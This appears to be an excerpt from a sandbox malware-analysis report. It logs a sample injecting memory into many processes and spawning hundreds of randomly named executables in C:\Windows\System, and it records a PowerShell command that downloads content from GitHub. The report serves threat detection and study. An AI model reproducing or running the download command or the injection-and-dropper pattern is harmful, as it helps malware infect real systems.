PID 2116 wrote to memory of 2660 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\WCqxFNE.exe
PID 2116 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\UskBwYd.exe
PID 2116 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\UskBwYd.exe
PID 2116 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\UskBwYd.exe
PID 2116 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\gasevNe.exe
PID 2116 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\gasevNe.exe
PID 2116 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\gasevNe.exe
PID 2116 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\nGOyGaI.exe
PID 2116 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\nGOyGaI.exe
PID 2116 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\nGOyGaI.exe
PID 2116 wrote to memory of 2516 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\WknOtpv.exe
PID 2116 wrote to memory of 2516 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\WknOtpv.exe
PID 2116 wrote to memory of 2516 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\WknOtpv.exe
PID 2116 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\VPiKJII.exe
PID 2116 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\VPiKJII.exe
PID 2116 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\VPiKJII.exe
PID 2116 wrote to memory of 3028 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\yeBqqJg.exe
PID 2116 wrote to memory of 3028 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\yeBqqJg.exe
PID 2116 wrote to memory of 3028 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\yeBqqJg.exe
PID 2116 wrote to memory of 1216 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\QVyWXtI.exe
PID 2116 wrote to memory of 1216 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\QVyWXtI.exe
PID 2116 wrote to memory of 1216 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\QVyWXtI.exe
PID 2116 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\MTvukea.exe
PID 2116 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\MTvukea.exe
PID 2116 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\MTvukea.exe
PID 2116 wrote to memory of 2824 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\qlQHsUV.exe
PID 2116 wrote to memory of 2824 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\qlQHsUV.exe
PID 2116 wrote to memory of 2824 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\qlQHsUV.exe
PID 2116 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\QugnbdK.exe
PID 2116 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\QugnbdK.exe
PID 2116 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\QugnbdK.exe
PID 2116 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\dSUDnPU.exe
PID 2116 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\dSUDnPU.exe
PID 2116 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\dSUDnPU.exe
PID 2116 wrote to memory of 1780 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\gFxIXFW.exe
PID 2116 wrote to memory of 1780 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\gFxIXFW.exe
PID 2116 wrote to memory of 1780 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\gFxIXFW.exe
PID 2116 wrote to memory of 1776 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\fPnZkqs.exe
PID 2116 wrote to memory of 1776 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\fPnZkqs.exe
PID 2116 wrote to memory of 1776 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\fPnZkqs.exe
PID 2116 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\xSyyvLF.exe
PID 2116 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\xSyyvLF.exe
PID 2116 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\xSyyvLF.exe
PID 2116 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\MfNMjXX.exe
PID 2116 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\MfNMjXX.exe
PID 2116 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\MfNMjXX.exe
PID 2116 wrote to memory of 560 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\eIngqdw.exe

Processes

C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\gYVZlOU.exe

C:\Windows\System\gYVZlOU.exe

C:\Windows\System\QGSMriC.exe

C:\Windows\System\QGSMriC.exe

C:\Windows\System\vFRtkAQ.exe

C:\Windows\System\vFRtkAQ.exe

C:\Windows\System\ZdCqpFX.exe

C:\Windows\System\ZdCqpFX.exe

C:\Windows\System\WCqxFNE.exe

C:\Windows\System\WCqxFNE.exe

C:\Windows\System\UskBwYd.exe

C:\Windows\System\UskBwYd.exe

C:\Windows\System\gasevNe.exe

C:\Windows\System\gasevNe.exe

C:\Windows\System\nGOyGaI.exe

C:\Windows\System\nGOyGaI.exe

C:\Windows\System\WknOtpv.exe

C:\Windows\System\WknOtpv.exe

C:\Windows\System\VPiKJII.exe

C:\Windows\System\VPiKJII.exe

C:\Windows\System\yeBqqJg.exe

C:\Windows\System\yeBqqJg.exe

C:\Windows\System\QVyWXtI.exe

C:\Windows\System\QVyWXtI.exe

C:\Windows\System\MTvukea.exe

C:\Windows\System\MTvukea.exe

C:\Windows\System\qlQHsUV.exe

C:\Windows\System\qlQHsUV.exe

C:\Windows\System\QugnbdK.exe

C:\Windows\System\QugnbdK.exe

C:\Windows\System\dSUDnPU.exe

C:\Windows\System\dSUDnPU.exe

C:\Windows\System\gFxIXFW.exe

C:\Windows\System\gFxIXFW.exe

C:\Windows\System\fPnZkqs.exe

C:\Windows\System\fPnZkqs.exe

C:\Windows\System\xSyyvLF.exe

C:\Windows\System\xSyyvLF.exe

C:\Windows\System\MfNMjXX.exe

C:\Windows\System\MfNMjXX.exe

C:\Windows\System\eIngqdw.exe

C:\Windows\System\eIngqdw.exe

C:\Windows\System\FAtsXen.exe

C:\Windows\System\FAtsXen.exe

C:\Windows\System\HIzPyZx.exe

C:\Windows\System\HIzPyZx.exe

C:\Windows\System\wsaXEOQ.exe

C:\Windows\System\wsaXEOQ.exe

C:\Windows\System\IHZsPtM.exe

C:\Windows\System\IHZsPtM.exe

C:\Windows\System\fMFcFUO.exe

C:\Windows\System\fMFcFUO.exe

C:\Windows\System\wSZfHtv.exe

C:\Windows\System\wSZfHtv.exe

C:\Windows\System\bZrkSyf.exe

C:\Windows\System\bZrkSyf.exe

C:\Windows\System\VqsQAdN.exe

C:\Windows\System\VqsQAdN.exe

C:\Windows\System\bYOkDGE.exe

C:\Windows\System\bYOkDGE.exe

C:\Windows\System\qcrXDsh.exe

C:\Windows\System\qcrXDsh.exe

C:\Windows\System\iuklPHn.exe

C:\Windows\System\iuklPHn.exe

C:\Windows\System\ePqiZpt.exe

C:\Windows\System\ePqiZpt.exe

C:\Windows\System\RwApMGw.exe

C:\Windows\System\RwApMGw.exe

C:\Windows\System\xWqJLui.exe

C:\Windows\System\xWqJLui.exe

C:\Windows\System\LUmsHIi.exe

C:\Windows\System\LUmsHIi.exe

C:\Windows\System\GbOZvcH.exe

C:\Windows\System\GbOZvcH.exe

C:\Windows\System\rAeuPnM.exe

C:\Windows\System\rAeuPnM.exe

C:\Windows\System\nYJGEGJ.exe

C:\Windows\System\nYJGEGJ.exe

C:\Windows\System\tSZHKbO.exe

C:\Windows\System\tSZHKbO.exe

C:\Windows\System\TKtBXTS.exe

C:\Windows\System\TKtBXTS.exe

C:\Windows\System\AceqGMx.exe

C:\Windows\System\AceqGMx.exe

C:\Windows\System\vsaZngE.exe

C:\Windows\System\vsaZngE.exe

C:\Windows\System\SAiOkiy.exe

C:\Windows\System\SAiOkiy.exe

C:\Windows\System\nKmPzZy.exe

C:\Windows\System\nKmPzZy.exe

C:\Windows\System\jljolPC.exe

C:\Windows\System\jljolPC.exe

C:\Windows\System\htLTtkA.exe

C:\Windows\System\htLTtkA.exe

C:\Windows\System\zLwthxm.exe

C:\Windows\System\zLwthxm.exe

C:\Windows\System\IMKqlCt.exe

C:\Windows\System\IMKqlCt.exe

C:\Windows\System\RzzWebI.exe

C:\Windows\System\RzzWebI.exe

C:\Windows\System\hStAtTq.exe

C:\Windows\System\hStAtTq.exe

C:\Windows\System\mrWsvOL.exe

C:\Windows\System\mrWsvOL.exe

C:\Windows\System\FMXOiKw.exe

C:\Windows\System\FMXOiKw.exe

C:\Windows\System\KZLmXvE.exe

C:\Windows\System\KZLmXvE.exe

C:\Windows\System\SJULiQl.exe

C:\Windows\System\SJULiQl.exe

C:\Windows\System\nmraRgc.exe

C:\Windows\System\nmraRgc.exe

C:\Windows\System\SdFcWSu.exe

C:\Windows\System\SdFcWSu.exe

C:\Windows\System\rENiatQ.exe

C:\Windows\System\rENiatQ.exe

C:\Windows\System\pLaAzEY.exe

C:\Windows\System\pLaAzEY.exe

C:\Windows\System\uxBRLih.exe

C:\Windows\System\uxBRLih.exe

C:\Windows\System\CbAundn.exe

C:\Windows\System\CbAundn.exe

C:\Windows\System\qbRjTnv.exe

C:\Windows\System\qbRjTnv.exe

C:\Windows\System\drCEDqA.exe

C:\Windows\System\drCEDqA.exe

C:\Windows\System\ispSBAn.exe

C:\Windows\System\ispSBAn.exe

C:\Windows\System\RDkayBa.exe

C:\Windows\System\RDkayBa.exe

C:\Windows\System\unegQFe.exe

C:\Windows\System\unegQFe.exe

C:\Windows\System\boLvOek.exe

C:\Windows\System\boLvOek.exe

C:\Windows\System\XBrcpCH.exe

C:\Windows\System\XBrcpCH.exe

C:\Windows\System\jENENjq.exe

C:\Windows\System\jENENjq.exe

C:\Windows\System\jimdObX.exe

C:\Windows\System\jimdObX.exe

C:\Windows\System\kvGUppW.exe

C:\Windows\System\kvGUppW.exe

C:\Windows\System\tpduXAw.exe

C:\Windows\System\tpduXAw.exe

C:\Windows\System\PJdrkQh.exe

C:\Windows\System\PJdrkQh.exe

C:\Windows\System\VciGPmt.exe

C:\Windows\System\VciGPmt.exe

C:\Windows\System\PfJumYQ.exe

C:\Windows\System\PfJumYQ.exe

C:\Windows\System\FkhPBEv.exe

C:\Windows\System\FkhPBEv.exe

C:\Windows\System\mWkulvH.exe

C:\Windows\System\mWkulvH.exe

C:\Windows\System\vYsrDSi.exe

C:\Windows\System\vYsrDSi.exe

C:\Windows\System\mrmEiPr.exe

C:\Windows\System\mrmEiPr.exe

C:\Windows\System\jQkHAbb.exe

C:\Windows\System\jQkHAbb.exe

C:\Windows\System\tzpgazN.exe

C:\Windows\System\tzpgazN.exe

C:\Windows\System\iSPlZZX.exe

C:\Windows\System\iSPlZZX.exe

C:\Windows\System\FCiWUPG.exe

C:\Windows\System\FCiWUPG.exe

C:\Windows\System\bvWwztN.exe

C:\Windows\System\bvWwztN.exe

C:\Windows\System\REgpuSO.exe

C:\Windows\System\REgpuSO.exe

C:\Windows\System\nwgULIS.exe

C:\Windows\System\nwgULIS.exe

C:\Windows\System\AATCTlp.exe

C:\Windows\System\AATCTlp.exe

C:\Windows\System\AdSzCgu.exe

C:\Windows\System\AdSzCgu.exe

C:\Windows\System\ZclmZUm.exe

C:\Windows\System\ZclmZUm.exe

C:\Windows\System\qFvVFXy.exe

C:\Windows\System\qFvVFXy.exe

C:\Windows\System\EjfJwPz.exe

C:\Windows\System\EjfJwPz.exe

C:\Windows\System\tnxtrtH.exe

C:\Windows\System\tnxtrtH.exe

C:\Windows\System\uPZkgpF.exe

C:\Windows\System\uPZkgpF.exe

C:\Windows\System\YKYEiAj.exe

C:\Windows\System\YKYEiAj.exe

C:\Windows\System\DXynwNT.exe

C:\Windows\System\DXynwNT.exe

C:\Windows\System\dKcAquD.exe

C:\Windows\System\dKcAquD.exe

C:\Windows\System\DdOgLXh.exe

C:\Windows\System\DdOgLXh.exe

C:\Windows\System\ogDanXL.exe

C:\Windows\System\ogDanXL.exe

C:\Windows\System\WdWRohx.exe

C:\Windows\System\WdWRohx.exe

C:\Windows\System\CigHANg.exe

C:\Windows\System\CigHANg.exe

C:\Windows\System\oGpUYgt.exe

C:\Windows\System\oGpUYgt.exe

C:\Windows\System\yRlDDdB.exe

C:\Windows\System\yRlDDdB.exe

C:\Windows\System\SaGHaQt.exe

C:\Windows\System\SaGHaQt.exe

C:\Windows\System\QMGJyKF.exe

C:\Windows\System\QMGJyKF.exe

C:\Windows\System\ijypLME.exe

C:\Windows\System\ijypLME.exe

C:\Windows\System\jyDuVsk.exe

C:\Windows\System\jyDuVsk.exe

C:\Windows\System\wLLdUFJ.exe

C:\Windows\System\wLLdUFJ.exe

C:\Windows\System\BzQheyq.exe

C:\Windows\System\BzQheyq.exe

C:\Windows\System\HsxFmbe.exe

C:\Windows\System\HsxFmbe.exe

C:\Windows\System\nIaWcTr.exe

C:\Windows\System\nIaWcTr.exe

C:\Windows\System\nQqJGqY.exe

C:\Windows\System\nQqJGqY.exe

C:\Windows\System\xLBhqYS.exe

C:\Windows\System\xLBhqYS.exe

C:\Windows\System\torfigR.exe

C:\Windows\System\torfigR.exe

C:\Windows\System\ueJklqW.exe

C:\Windows\System\ueJklqW.exe

C:\Windows\System\iKHNMfJ.exe

C:\Windows\System\iKHNMfJ.exe

C:\Windows\System\JlAsdzT.exe

C:\Windows\System\JlAsdzT.exe

C:\Windows\System\WRpESBY.exe

C:\Windows\System\WRpESBY.exe

C:\Windows\System\lfEehMB.exe

C:\Windows\System\lfEehMB.exe

C:\Windows\System\taXYKZd.exe

C:\Windows\System\taXYKZd.exe

C:\Windows\System\pbsDpKy.exe

C:\Windows\System\pbsDpKy.exe

C:\Windows\System\JqcZMXl.exe

C:\Windows\System\JqcZMXl.exe

C:\Windows\System\FuTbqye.exe

C:\Windows\System\FuTbqye.exe

C:\Windows\System\xRopNSV.exe

C:\Windows\System\xRopNSV.exe

C:\Windows\System\ezmUMuK.exe

C:\Windows\System\ezmUMuK.exe

C:\Windows\System\wTDkDuR.exe

C:\Windows\System\wTDkDuR.exe

C:\Windows\System\ShSyNSx.exe

C:\Windows\System\ShSyNSx.exe

C:\Windows\System\rhnptuk.exe

C:\Windows\System\rhnptuk.exe

C:\Windows\System\MhhQmFU.exe

C:\Windows\System\MhhQmFU.exe

C:\Windows\System\bbdFCnY.exe

C:\Windows\System\bbdFCnY.exe

C:\Windows\System\yPLLpOd.exe

C:\Windows\System\yPLLpOd.exe

C:\Windows\System\KvchCmz.exe

C:\Windows\System\KvchCmz.exe

C:\Windows\System\CVigImz.exe

C:\Windows\System\CVigImz.exe

C:\Windows\System\slPWKLZ.exe

C:\Windows\System\slPWKLZ.exe

C:\Windows\System\bABrwpe.exe

C:\Windows\System\bABrwpe.exe

C:\Windows\System\mVpcesd.exe

C:\Windows\System\mVpcesd.exe

C:\Windows\System\COdpFDS.exe

C:\Windows\System\COdpFDS.exe

C:\Windows\System\cPFjTCH.exe

C:\Windows\System\cPFjTCH.exe

C:\Windows\System\YDLaLxl.exe

C:\Windows\System\YDLaLxl.exe

C:\Windows\System\ArOmLbH.exe

C:\Windows\System\ArOmLbH.exe

C:\Windows\System\LDCJvZT.exe

C:\Windows\System\LDCJvZT.exe

C:\Windows\System\gDVCOhe.exe

C:\Windows\System\gDVCOhe.exe

C:\Windows\System\RLlFKOE.exe

C:\Windows\System\RLlFKOE.exe

C:\Windows\System\ZgOWEAJ.exe

C:\Windows\System\ZgOWEAJ.exe

C:\Windows\System\xFlONYw.exe

C:\Windows\System\xFlONYw.exe

C:\Windows\System\CJQXgsv.exe

C:\Windows\System\CJQXgsv.exe

C:\Windows\System\JpEorQY.exe

C:\Windows\System\JpEorQY.exe

C:\Windows\System\XJdCGLU.exe

C:\Windows\System\XJdCGLU.exe

C:\Windows\System\UfhhOND.exe

C:\Windows\System\UfhhOND.exe

C:\Windows\System\KKODmfj.exe

C:\Windows\System\KKODmfj.exe

C:\Windows\System\eVRNWId.exe

C:\Windows\System\eVRNWId.exe

C:\Windows\System\epxeLAy.exe

C:\Windows\System\epxeLAy.exe

C:\Windows\System\blhigKP.exe

C:\Windows\System\blhigKP.exe

C:\Windows\System\vYvdHyR.exe

C:\Windows\System\vYvdHyR.exe

C:\Windows\System\sIgmVCV.exe

C:\Windows\System\sIgmVCV.exe

C:\Windows\System\oCdheDK.exe

C:\Windows\System\oCdheDK.exe

C:\Windows\System\ndtPXGM.exe

C:\Windows\System\ndtPXGM.exe

C:\Windows\System\BTGoKWe.exe

C:\Windows\System\BTGoKWe.exe

C:\Windows\System\KUYaYYW.exe

C:\Windows\System\KUYaYYW.exe

C:\Windows\System\FXgBvlE.exe

C:\Windows\System\FXgBvlE.exe

C:\Windows\System\jdbyTNe.exe

C:\Windows\System\jdbyTNe.exe

C:\Windows\System\ajkUJJW.exe

C:\Windows\System\ajkUJJW.exe

C:\Windows\System\ubuzfHQ.exe

C:\Windows\System\ubuzfHQ.exe

C:\Windows\System\yuWontO.exe

C:\Windows\System\yuWontO.exe

C:\Windows\System\JhEsVsm.exe

C:\Windows\System\JhEsVsm.exe

C:\Windows\System\UAcKSqd.exe

C:\Windows\System\UAcKSqd.exe

C:\Windows\System\aFmaCey.exe

C:\Windows\System\aFmaCey.exe

C:\Windows\System\eowCusc.exe

C:\Windows\System\eowCusc.exe

C:\Windows\System\bIsOSdy.exe

C:\Windows\System\bIsOSdy.exe

C:\Windows\System\WpRfVHW.exe

C:\Windows\System\WpRfVHW.exe

C:\Windows\System\CnDiFtQ.exe

C:\Windows\System\CnDiFtQ.exe

C:\Windows\System\AUMZBWN.exe

C:\Windows\System\AUMZBWN.exe

C:\Windows\System\SvQGzBF.exe

C:\Windows\System\SvQGzBF.exe

C:\Windows\System\KgcGSFw.exe

C:\Windows\System\KgcGSFw.exe

C:\Windows\System\XICrftZ.exe

C:\Windows\System\XICrftZ.exe

C:\Windows\System\jwjcNOb.exe

C:\Windows\System\jwjcNOb.exe

C:\Windows\System\yBJEFrM.exe

C:\Windows\System\yBJEFrM.exe

C:\Windows\System\jEnKZcx.exe

C:\Windows\System\jEnKZcx.exe

C:\Windows\System\mLgFOyG.exe

C:\Windows\System\mLgFOyG.exe

C:\Windows\System\CQFjNwL.exe

C:\Windows\System\CQFjNwL.exe

C:\Windows\System\ywwXCvU.exe

C:\Windows\System\ywwXCvU.exe

C:\Windows\System\vpLhbwx.exe

C:\Windows\System\vpLhbwx.exe

C:\Windows\System\oSCNGvC.exe

C:\Windows\System\oSCNGvC.exe

C:\Windows\System\NLMzepu.exe

C:\Windows\System\NLMzepu.exe

C:\Windows\System\GOSUysO.exe

C:\Windows\System\GOSUysO.exe

C:\Windows\System\ivyLZeU.exe

C:\Windows\System\ivyLZeU.exe

C:\Windows\System\fDUIrTR.exe

C:\Windows\System\fDUIrTR.exe

C:\Windows\System\NamRozJ.exe

C:\Windows\System\NamRozJ.exe

C:\Windows\System\vStCrQy.exe

C:\Windows\System\vStCrQy.exe

C:\Windows\System\xiqxDnK.exe

C:\Windows\System\xiqxDnK.exe

C:\Windows\System\fMZrGDo.exe

C:\Windows\System\fMZrGDo.exe

C:\Windows\System\WraDaRj.exe

C:\Windows\System\WraDaRj.exe

C:\Windows\System\CVICDeH.exe

C:\Windows\System\CVICDeH.exe

C:\Windows\System\vwUlBEW.exe

C:\Windows\System\vwUlBEW.exe

C:\Windows\System\uFQGQjl.exe

C:\Windows\System\uFQGQjl.exe

C:\Windows\System\wYqejOP.exe

C:\Windows\System\wYqejOP.exe

C:\Windows\System\WKvurYQ.exe

C:\Windows\System\WKvurYQ.exe

C:\Windows\System\DwmMcOS.exe

C:\Windows\System\DwmMcOS.exe

C:\Windows\System\HcjLYdB.exe

C:\Windows\System\HcjLYdB.exe

C:\Windows\System\cXbpOpZ.exe

C:\Windows\System\cXbpOpZ.exe

C:\Windows\System\PesklXm.exe

C:\Windows\System\PesklXm.exe

C:\Windows\System\zhWjxrh.exe

C:\Windows\System\zhWjxrh.exe

C:\Windows\System\yyMuQhq.exe

C:\Windows\System\yyMuQhq.exe

C:\Windows\System\UaLtVDQ.exe

C:\Windows\System\UaLtVDQ.exe

C:\Windows\System\iTSAPxa.exe

C:\Windows\System\iTSAPxa.exe

C:\Windows\System\tbSNxgX.exe

C:\Windows\System\tbSNxgX.exe

C:\Windows\System\cnQYoBK.exe

C:\Windows\System\cnQYoBK.exe

C:\Windows\System\JmkOdcT.exe

C:\Windows\System\JmkOdcT.exe

C:\Windows\System\FUyJkyO.exe

C:\Windows\System\FUyJkyO.exe

C:\Windows\System\RntWtAd.exe

C:\Windows\System\RntWtAd.exe

C:\Windows\System\mKpSeYr.exe

C:\Windows\System\mKpSeYr.exe

C:\Windows\System\VfJtBVF.exe

C:\Windows\System\VfJtBVF.exe

C:\Windows\System\JcBMwgp.exe

C:\Windows\System\JcBMwgp.exe

C:\Windows\System\Prokgpq.exe

C:\Windows\System\Prokgpq.exe

C:\Windows\System\SONhwrQ.exe

C:\Windows\System\SONhwrQ.exe

C:\Windows\System\lrFoKxv.exe

C:\Windows\System\lrFoKxv.exe

C:\Windows\System\xAZFoly.exe

C:\Windows\System\xAZFoly.exe

C:\Windows\System\uWsDcqI.exe

C:\Windows\System\uWsDcqI.exe

C:\Windows\System\JuWHfxy.exe

C:\Windows\System\JuWHfxy.exe

C:\Windows\System\LMrieni.exe

C:\Windows\System\LMrieni.exe

C:\Windows\System\KpOzGNF.exe

C:\Windows\System\KpOzGNF.exe

C:\Windows\System\wOrvFcB.exe

C:\Windows\System\wOrvFcB.exe

C:\Windows\System\JTWusPR.exe

C:\Windows\System\JTWusPR.exe

C:\Windows\System\FDsYePi.exe

C:\Windows\System\FDsYePi.exe

C:\Windows\System\tGHAVNm.exe

C:\Windows\System\tGHAVNm.exe

C:\Windows\System\etlFKZq.exe

C:\Windows\System\etlFKZq.exe

C:\Windows\System\bcRoUxH.exe

C:\Windows\System\bcRoUxH.exe

C:\Windows\System\WLJTmNN.exe

C:\Windows\System\WLJTmNN.exe

C:\Windows\System\agfbBig.exe

C:\Windows\System\agfbBig.exe

C:\Windows\System\jtmcggo.exe

C:\Windows\System\jtmcggo.exe

C:\Windows\System\PTNKMdv.exe

C:\Windows\System\PTNKMdv.exe

C:\Windows\System\MKJGObM.exe

C:\Windows\System\MKJGObM.exe

C:\Windows\System\NgNWchO.exe

C:\Windows\System\NgNWchO.exe

C:\Windows\System\LLKPiqc.exe

C:\Windows\System\LLKPiqc.exe

C:\Windows\System\UrkRXDS.exe

C:\Windows\System\UrkRXDS.exe

C:\Windows\System\EgpksNX.exe

C:\Windows\System\EgpksNX.exe

C:\Windows\System\EQPUrqF.exe

C:\Windows\System\EQPUrqF.exe

C:\Windows\System\tTrHnoU.exe

C:\Windows\System\tTrHnoU.exe

C:\Windows\System\hUohcBT.exe

C:\Windows\System\hUohcBT.exe

C:\Windows\System\jkzkANr.exe

C:\Windows\System\jkzkANr.exe

C:\Windows\System\SuCWgzw.exe

C:\Windows\System\SuCWgzw.exe

C:\Windows\System\ntJzEbi.exe

C:\Windows\System\ntJzEbi.exe

C:\Windows\System\BXjFszX.exe

C:\Windows\System\BXjFszX.exe

C:\Windows\System\CxPgeVL.exe

C:\Windows\System\CxPgeVL.exe

C:\Windows\System\QPKPppg.exe

C:\Windows\System\QPKPppg.exe

C:\Windows\System\PnBiVQF.exe

C:\Windows\System\PnBiVQF.exe

C:\Windows\System\JiSZFhT.exe

C:\Windows\System\JiSZFhT.exe

C:\Windows\System\fFowYwH.exe

C:\Windows\System\fFowYwH.exe

C:\Windows\System\ZYjEAQc.exe

C:\Windows\System\ZYjEAQc.exe

C:\Windows\System\zdFLCPX.exe

C:\Windows\System\zdFLCPX.exe

C:\Windows\System\sCGAypT.exe

C:\Windows\System\sCGAypT.exe

C:\Windows\System\TJkyceO.exe

C:\Windows\System\TJkyceO.exe

C:\Windows\System\RxSsyZn.exe

C:\Windows\System\RxSsyZn.exe

C:\Windows\System\RUtKlFE.exe

C:\Windows\System\RUtKlFE.exe

C:\Windows\System\NTyBCMf.exe

C:\Windows\System\NTyBCMf.exe

C:\Windows\System\ihuvfjX.exe

C:\Windows\System\ihuvfjX.exe

C:\Windows\System\fUocFMB.exe

C:\Windows\System\fUocFMB.exe

C:\Windows\System\HRKDHnx.exe

C:\Windows\System\HRKDHnx.exe

C:\Windows\System\lCFhMJH.exe

C:\Windows\System\lCFhMJH.exe

C:\Windows\System\EzYnlft.exe

C:\Windows\System\EzYnlft.exe

C:\Windows\System\QrCtoRs.exe

C:\Windows\System\QrCtoRs.exe

C:\Windows\System\GGNuTTq.exe

C:\Windows\System\GGNuTTq.exe

C:\Windows\System\FPrYADM.exe

C:\Windows\System\FPrYADM.exe

C:\Windows\System\IWzgaid.exe

C:\Windows\System\IWzgaid.exe

C:\Windows\System\jZEuZzd.exe

C:\Windows\System\jZEuZzd.exe

C:\Windows\System\nsGauTb.exe

C:\Windows\System\nsGauTb.exe

C:\Windows\System\IHwdKhx.exe

C:\Windows\System\IHwdKhx.exe

